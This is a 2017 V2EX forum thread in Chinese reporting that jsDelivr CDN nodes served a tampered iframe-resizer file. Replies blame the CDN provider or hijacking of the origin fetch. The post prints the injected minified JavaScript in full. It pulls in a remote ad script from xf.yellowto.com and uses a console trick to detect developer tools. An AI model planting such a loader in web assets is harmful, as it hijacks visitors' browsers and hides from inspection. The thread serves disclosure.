如果你也在用 jsdelivr,那么请小心,他的节点会投毒。

2017-11-03 02:54:02 +08:00
 sexrobot
$ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js -v
*   Trying 101.66.227.63...
* TCP_NODELAY set
* Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net
*  start date: Apr 20 00:00:00 2014 GMT
*  expire date: Apr 19 23:59:59 2019 GMT
*  subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net"
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9e9c00aa00)
> GET /gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js HTTP/2
> Host: cdn.jsdelivr.net
> User-Agent: curl/7.54.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200
< date: Thu, 02 Nov 2017 18:49:08 GMT
< content-type: application/x-javascript
< content-length: 682
< cache-control: max-age=604800
< age: 1
< x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0)
<
* Connection #0 to host cdn.jsdelivr.net left intact
(function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()%

里面的 xf.yellowto.com ,是个广告脚本。 因为走了 Https,所以可能性如下:

  1. 官方干的;
  2. 网宿 CDN 干的( quantl 是网宿参股公司,quantl 国内节点为网宿实际运营);
  3. CDN 回原站走了 HTTP,被国家劫持?
24362 次点击
所在节点    程序员
11 条回复
sexrobot
2017-11-03 04:02:53 +08:00
jsdelivr 响应很快,确认是 CDN 服务商网宿投毒,现在已经全部切换回了 CloudFlare。
WoadZS
2017-11-03 04:37:45 +08:00
@sexrobot 那岂不是国内访问速度直接尿崩
WoadZS
2017-11-03 04:49:37 +08:00
jsdelivr 官方的回复是并不确定问题所在,只是在等待网宿回复,切换回 CloudFlare 也是临时性的举动。
RqPS6rhmP3Nyn3Tm
2017-11-03 05:32:49 +08:00
网宿作为 cdn 企业也会干这种事?以后谁敢用啊
missdeer
2017-11-03 07:35:33 +08:00
@BXIA 放心吧,国内消费者都是好了伤疤忘了疼的
n329291362
2017-11-03 08:10:59 +08:00
emmmm 我们这里用的七牛融合 cdn 也遇到了一样的脚本
n329291362
2017-11-03 08:11:24 +08:00
全程 https 不知道 看来应该是 cdn 投的
miyuki
2017-11-03 08:12:40 +08:00
卧槽
oott123
2017-11-03 08:50:34 +08:00
我猜应该是回源 http 被劫持了…这听起来太可怕了
wsy2220
2017-11-03 12:16:37 +08:00
明显回源的时候被劫持了
wwwwzf
2020-12-04 08:35:44 +08:00
用得少

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/403110

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX